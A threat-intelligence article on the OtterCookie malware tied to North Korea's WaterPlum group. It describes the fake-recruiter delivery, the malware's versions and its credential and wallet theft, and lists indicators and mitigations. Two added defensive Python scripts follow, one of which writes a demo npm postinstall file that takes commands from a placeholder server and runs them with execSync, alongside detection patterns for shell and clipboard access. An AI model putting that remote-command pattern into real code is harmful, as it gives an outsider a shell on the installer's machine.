In the ever-evolving landscape of cyber threats, state-sponsored actors continually refine their tactics to exploit vulnerabilities and achieve their objectives. One such actor, the North Korea-linked group known as WaterPlum (also referred to as Famous Chollima or PurpleBravo), has been observed deploying a new malware strain named OtterCookie. This malware is part of the broader “Contagious Interview” campaign, which targets financial institutions, cryptocurrency operators, and FinTech companies worldwide. Since its emergence in September 2024, OtterCookie has undergone several iterations, each introducing new features and capabilities that enhance its effectiveness and stealth.
This article delves into the additional features of OtterCookie malware used by WaterPlum, examining its evolution, functionalities, and the implications for cybersecurity professionals.
The Contagious Interview Campaign and OtterCookie’s Emergence
The Contagious Interview campaign is characterized by its use of social engineering tactics, particularly impersonating recruiters to lure victims into downloading malicious software under the guise of job opportunities. These deceptive practices have been instrumental in distributing malware strains such as BeaverTail and InvisibleFerret. In September 2024, cybersecurity researchers identified a new addition to this arsenal: OtterCookie. This JavaScript-based malware is typically delivered through compromised Node.js projects, npm packages, or applications developed using Qt or Electron frameworks. Once executed, OtterCookie establishes communication with a command-and-control (C2) server using the Socket.IO library, allowing attackers to issue commands and exfiltrate data.
Evolution of OtterCookie: Versions and Features
Since its initial detection, OtterCookie has evolved through multiple versions, each introducing new functionalities:
OtterCookie v1
- File Grabber Functionality: The initial version focused on collecting files from the infected system.
OtterCookie v2
- Shell Command Execution: Introduced the ability to execute shell commands received from the C2 server, allowing for more dynamic interactions with the infected system.
OtterCookie v3 (Observed in February 2025)
- Modular Architecture: Split into main and upload modules.
- Windows Environment Support: Enhanced compatibility with Windows systems.
- Hardcoded File Collection: Targeted document files, images, and cryptocurrency-related files without relying on remote commands.
OtterCookie v4 (Observed in April 2025)
- Stealer Modules: Introduced modules to extract credentials from browsers like Google Chrome and Brave, as well as MetaMask wallets.
- Virtual Environment Detection: Implemented checks to identify sandboxed or virtualized environments, aiding in evasion.
- Clipboard Data Theft: Utilized standard OS commands to capture clipboard contents, moving away from third-party libraries.
The progression from v1 to v4 demonstrates a concerted effort by WaterPlum to enhance OtterCookie’s capabilities, making it a more potent tool for data exfiltration and system compromise.
Technical Analysis of OtterCookie’s Capabilities
Communication and Command Execution
OtterCookie leverages the Socket.IO library to establish real-time, bidirectional communication with its C2 server. This connection facilitates the execution of various commands, including:
- Shell Commands: Executing system commands to gather information or manipulate the system.
- File Exfiltration: Transferring targeted files to the attacker’s server.
- Clipboard Monitoring: Capturing clipboard data, which may contain sensitive information.
The use of Socket.IO allows OtterCookie to maintain a persistent and responsive connection with its operators, enabling real-time control over the infected system.
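As an added example (not code from the article, from the researchers who analyzed the malware, or from the malware itself), the following Python script statically triages a Node.js project of the kind the campaign sends to candidates as a "coding test", flagging the delivery and C2 traits described above: an npm lifecycle script that runs automatically on install, a socket.io client dependency, and source that executes shell commands or reads the clipboard. The sample project it writes to a temporary directory is constructed for the demo, and the regex heuristics and the placeholder host example.invalid are assumptions, not published signatures.

```python
"""Static triage of a Node.js project received from an unknown 'recruiter'.

Added example, not code from the article or from any vendor report. It looks
for the traits the article attributes to OtterCookie's delivery and C2:
an npm lifecycle script that runs on install, a socket.io client dependency,
and source that executes shell commands. The project written by
build_sample_project() is constructed for the demo; the pattern list is an
assumption about what is worth flagging, not a published signature.
"""
import json
import os
import re
import tempfile

# Scripts npm runs automatically during `npm install`, before anyone reads the code.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns worth a second look in a "take-home test" repo (assumed).
SOURCE_PATTERNS = {
    "socket.io client": re.compile(
        r"require\(['\"]socket\.io-client['\"]\)|from ['\"]socket\.io-client['\"]"
    ),
    "shell execution": re.compile(
        r"require\(['\"]child_process['\"]\)|\b(execSync|exec|spawn)\s*\("
    ),
    "clipboard read": re.compile(r"\b(pbpaste|xclip|Get-Clipboard)\b"),
    "runtime eval": re.compile(r"\beval\s*\(|new Function\s*\("),
}


def triage_project(root: str) -> dict:
    """Return lifecycle scripts, socket.io dependencies and per-file pattern hits."""
    findings = {"lifecycle_scripts": {}, "dependencies": [], "source_hits": []}
    pkg_path = os.path.join(root, "package.json")
    if os.path.exists(pkg_path):
        with open(pkg_path, encoding="utf-8") as f:
            pkg = json.load(f)
        for hook in LIFECYCLE_HOOKS:
            if hook in pkg.get("scripts", {}):
                findings["lifecycle_scripts"][hook] = pkg["scripts"][hook]
        for section in ("dependencies", "devDependencies"):
            for name in pkg.get(section, {}):
                if name.startswith("socket.io"):
                    findings["dependencies"].append(name)
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != "node_modules"]  # skip installed deps
        for fn in filenames:
            if not fn.endswith((".js", ".cjs", ".mjs", ".ts")):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as f:
                text = f.read()
            for label, pattern in SOURCE_PATTERNS.items():
                if pattern.search(text):
                    findings["source_hits"].append((os.path.relpath(path, root), label))
    return findings


def build_sample_project(root: str) -> None:
    """Write a constructed project that exhibits all three traits (demo input only)."""
    pkg = {
        "name": "coding-challenge",
        "version": "1.0.0",
        "scripts": {"postinstall": "node scripts/setup.js", "test": "jest"},
        "dependencies": {"socket.io-client": "^4.7.0", "express": "^4.19.0"},
    }
    os.makedirs(os.path.join(root, "scripts"))
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as f:
        json.dump(pkg, f)
    with open(os.path.join(root, "scripts", "setup.js"), "w", encoding="utf-8") as f:
        f.write(
            "const { io } = require('socket.io-client');\n"
            "const { execSync } = require('child_process');\n"
            "const s = io('https://example.invalid');\n"  # placeholder, not a real C2
            "s.on('cmd', c => s.emit('out', execSync(c).toString()));\n"
        )
    with open(os.path.join(root, "index.js"), "w", encoding="utf-8") as f:
        f.write("module.exports = (a, b) => a + b;\n")


def demo() -> dict:
    """Build the constructed project in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_project(tmp)
        return triage_project(tmp)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it against a real repository with `triage_project("/path/to/repo")` before `npm install`; a postinstall hook pointing at a file that both opens a socket.io connection and calls execSync is exactly the shape of remote shell the section above describes, and is reason enough not to install the project outside a throwaway VM.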
Credential and Data Theft
OtterCookie’s stealer modules are designed to extract sensitive information from various sources:
- Browser Credentials: Decrypting and extracting login data from browsers like Google Chrome, using the Windows Data Protection API (DPAPI) to unwrap the stored encryption key on Windows hosts.
- Cryptocurrency Wallets: Targeting files associated with MetaMask and other wallet extensions to access cryptocurrency assets.
- macOS Keychain: Accessing stored credentials on macOS systems.
The malware’s ability to harvest such data poses significant risks to individuals and organizations, particularly those involved in financial services and cryptocurrency operations.
Evasion Techniques
To avoid detection and analysis, OtterCookie incorporates several evasion strategies:
- Virtual Environment Detection: Identifying sandboxed or virtualized environments to prevent execution in analysis settings.
- Standard Command Utilization: Employing native OS commands for operations like clipboard access, reducing reliance on detectable third-party libraries.
- Modular Design: Separating functionalities into distinct modules, allowing for selective deployment and reducing the malware’s footprint.
These techniques enhance OtterCookie’s stealth and persistence within compromised systems.
Indicators of Compromise (IoCs)
Security professionals should be aware of the following IoCs associated with OtterCookie:
- Domains:
alchemy-api-v3[.]cloud
chainlink-api-v3[.]cloud
moralis-api-v3[.]cloud
modilus[.]io
- IP Addresses:
116[.]202.208.125
65[.]108.122.31
194[.]164.234.151
135[.]181.123.177
188[.]116.26.84
65[.]21.23.63
95[.]216.227.188
Monitoring network traffic for connections to these domains and IP addresses can aid in the early detection of OtterCookie infections.
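The following Python script, added here and not part of the original article, refangs the IoCs listed above and matches them against proxy-style log lines, including subdomains of the listed domains and case differences in hostnames. The indicator values are the ones in the list; the log format (timestamp, source IP, destination host or IP with an optional port) and the sample lines are constructed for the example.

```python
"""Match proxy/DNS log lines against the OtterCookie IoCs listed above.

Added example, not part of the original article. The IoC values are the
ones listed in the article; the log lines are constructed for the demo and
the log format (timestamp, source IP, destination host or IP) is an
assumption about the reader's own telemetry.
"""
import ipaddress
import re

# Defanged indicators, copied from the article's IoC list.
DEFANGED_DOMAINS = [
    "alchemy-api-v3[.]cloud",
    "chainlink-api-v3[.]cloud",
    "moralis-api-v3[.]cloud",
    "modilus[.]io",
]
DEFANGED_IPS = [
    "116[.]202.208.125",
    "65[.]108.122.31",
    "194[.]164.234.151",
    "135[.]181.123.177",
    "188[.]116.26.84",
    "65[.]21.23.63",
    "95[.]216.227.188",
]


def refang(indicator: str) -> str:
    """Turn '65[.]21.23.63' or 'modilus[.]io' back into a live string."""
    return indicator.replace("[.]", ".")


DOMAINS = {refang(d).lower() for d in DEFANGED_DOMAINS}
IPS = {ipaddress.ip_address(refang(i)) for i in DEFANGED_IPS}

# Assumed log shape: "<timestamp> <src_ip> <dst_host_or_ip>[:port] ..."
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+([^\s:]+)(?::(\d+))?")


def classify_destination(dst: str):
    """Return ('ip', IPv4Address/IPv6Address) or ('domain', lowercase name)."""
    try:
        return "ip", ipaddress.ip_address(dst)
    except ValueError:
        return "domain", dst.lower().rstrip(".")


def domain_matches(host: str) -> bool:
    """Exact match or a subdomain of a listed domain (api.modilus.io hits modilus.io)."""
    return any(host == d or host.endswith("." + d) for d in DOMAINS)


def scan_lines(lines):
    """Return [(line_number, indicator)] for each line whose destination is an IoC."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        kind, value = classify_destination(m.group(3))
        if kind == "ip" and value in IPS:
            hits.append((n, str(value)))
        elif kind == "domain" and domain_matches(value):
            hits.append((n, value))
    return hits


# Constructed sample log lines (not real telemetry).
SAMPLE_LOG = [
    "2025-05-01T10:00:01Z 10.0.0.5 registry.npmjs.org:443 GET /socket.io",
    "2025-05-01T10:00:02Z 10.0.0.5 api.modilus.io:443 POST /socket.io/?EIO=4",
    "2025-05-01T10:00:03Z 10.0.0.7 116.202.208.125:443 CONNECT",
    "2025-05-01T10:00:04Z 10.0.0.7 65.108.122.310 GET /",  # malformed IP, no hit
    "2025-05-01T10:00:05Z 10.0.0.9 ALCHEMY-API-V3.CLOUD GET /",
]

if __name__ == "__main__":
    for n, ioc in scan_lines(SAMPLE_LOG):
        print(f"line {n}: matched {ioc}")
```

Feed it your own proxy or DNS export after adjusting LOG_RE to the field order of that log; keeping the indicators in their defanged form in the script means the list can be pasted straight from a report without accidentally creating live links in tickets or chat.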
Recommendations to Mitigate OtterCookie Threats
To protect against OtterCookie and similar threats, cybersecurity professionals should consider the following measures:
- Employee Training: Educate staff on recognizing phishing attempts and the dangers of unsolicited job offers.
- Software Verification: Ensure that all software and packages are obtained from trusted sources and verified before installation. Code received as part of a recruitment exercise (a “take-home test” repository or npm package) should be treated as untrusted and opened only in an isolated environment, never on a workstation that holds credentials or wallets.
- Endpoint Protection: Deploy advanced endpoint detection and response (EDR) solutions capable of identifying and mitigating sophisticated malware.
- Network Segmentation: Implement network segmentation to limit the spread of malware within the organization.
- Regular Updates: Keep all systems and software up to date with the latest security patches.
- Access Controls: Apply the principle of least privilege to restrict user access to only necessary resources.
- Monitoring and Logging: Continuously monitor systems and maintain logs to detect unusual activities promptly.
- Incident Response Plan: Develop and regularly update an incident response plan to address potential breaches effectively.
- Threat Intelligence Sharing: Participate in information-sharing communities to stay informed about emerging threats.
- Regular Audits: Conduct periodic security audits to identify and remediate vulnerabilities.
Conclusion
The emergence and evolution of OtterCookie malware underscore the persistent and adaptive nature of state-sponsored cyber threats. By continuously enhancing their tools and tactics, groups like WaterPlum pose significant risks to organizations worldwide, particularly those in the financial and cryptocurrency sectors. Cybersecurity professionals must remain vigilant, adopting comprehensive and proactive strategies to detect, prevent, and respond to such threats effectively. Staying informed about the latest developments in malware capabilities and attack vectors is crucial in safeguarding organizational assets and maintaining the integrity of digital infrastructures.